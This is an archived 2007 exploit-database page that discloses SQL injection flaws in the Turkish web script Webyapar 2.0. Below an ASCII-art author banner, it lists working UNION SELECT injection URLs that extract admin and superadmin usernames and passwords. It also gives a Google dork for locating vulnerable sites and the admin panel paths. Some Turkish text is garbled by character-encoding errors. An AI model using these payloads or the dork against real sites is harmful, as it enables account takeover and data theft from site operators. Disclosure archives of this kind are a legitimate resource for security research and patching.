[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities
# Published : 2007-07-25
# Author : bypass
# Previous Title : Adult Directory (cat_id) Remote SQL Injection Vulnerability
# Next Title : IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability 


#########################################################################################################################
#########################################################################################################################
############/$$$$$$$$$$$////$$$$$$$$$$$//###################///////////###############//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$/
###///////##/$$$$$$$$//////////$$$$$$$$//####################/////////#####//////$$$$$//$$$$/////////////$$$$////////////
##///////###/$$$$$$$////////////$$$$$$$//#####///////////#####///////#####///////$$$$$//$$$$/////////////$$$$////////////
##//////###///$$$$$$$//////////$$$$$$$///#####///////////#####//////#####////////$$$$$//$$$$/////////////$$$$////////////
##/////###/////$$$$$$$////////$$$$$$$////#####//////////######/////#####/////////$$$$$//$$$$/////////////$$$$////////////
##////###///////$$$$$$$//////$$$$$$$/////######////////#######////#####//////////$$$$$//$$$$/////////////$$$$////////////
##///###/////////$$$$$$$////$$$$$$$//////#######//////#######////#####///////////$$$$$//$$$$/////////////$$$$////////////
###################$$$$$$##$$$$$$################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
####################$$$$$$$$$$$$#################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
##///###////////////$$$$$$$$$$$$/////////#########////////////#####//////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
##////###////////////$$$$$$$$$$//////////########////////////#####///////////////$$$$$/////////////$$$$//////////////$$$$
##/////###////////////$$$$$$$$///////////#######////////////#####////////////////$$$$$/////////////$$$$//////////////$$$$
##//////###////////////$$$$$$////////////#######///////////#####/////////////////$$$$$/////////////$$$$//////////////$$$$
###//////##/////////////$$$$/////////////#######//////////#####//////////////////$$$$$/////////////$$$$//////////////$$$$
############/////////////$$//////////////#######/////////#####///////////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
#########################################################################################################################
#########################################################################################################################
##### TURKISH SECUR?ˇăTY MAN AND C0D3R      ####################### MA?ˇăL :  dumanhack@gmail.com ###########################
##### -                                   ##### web  :                                                         ##########
##### PERFECT C0D3R AND SECUR?ˇăTY          ##         >>>>>>>>>>>>>> MESSAGE :  HAYAT ?ˇăLLEGAL <<<<<<<<<<<<<<<   ##
#########################################################################################################################

# Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability

# AUTHOR: : bypass 

# script name : Webyapar v2.0  { 700$ }

# Language : Tr

# scritp web page : www.webyapar.com

# script bug : remote sql enjeksiyon

# script admin panel1 : http://victim/script_path/yonetim

# script admin panel2 : http://victim/script_path/yonetim2

# google dork : inurl:"?page=duyurular_detay&id="

#Message Tr : ingilizcem pek iyi degildir. kodun piyasada sat?ˇŔs degeri 700$ - kodun sql d?ˇŔs?ˇŔnda xss ac?ˇŔklar?ˇŔda bulunmaktad?ˇŔr
ama pek fazla xss ac?ˇŔklar?ˇŔ i??inize yaramayacakt?ˇŔr. yonetim panelleri standart verilmistir...

# Message Tr : Hayat ?ˇăllegal - / -


< / -------------------------------------------------------------------------------------------------------- />


< / ------   Example sql bug 1 admin username :   ------ / >  


http://V?ˇăCT?ˇăM/SCR?ˇăPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin




< / ------   Example sql bug 1 admin password :   ------ / > 


http://V?ˇăCT?ˇăM/SCR?ˇăPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin




< / ------   Example sql bug 2 superadmin password and admin username :   ------ / > 



http://V?ˇăCT?ˇăM/SCR?ˇăPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin

< / -------------------------------------------------------------------------------------------------------- />


Sql enjeksiyon bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin

Sql enjeksiyon bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin

# www.Syue.com [2007-07-25]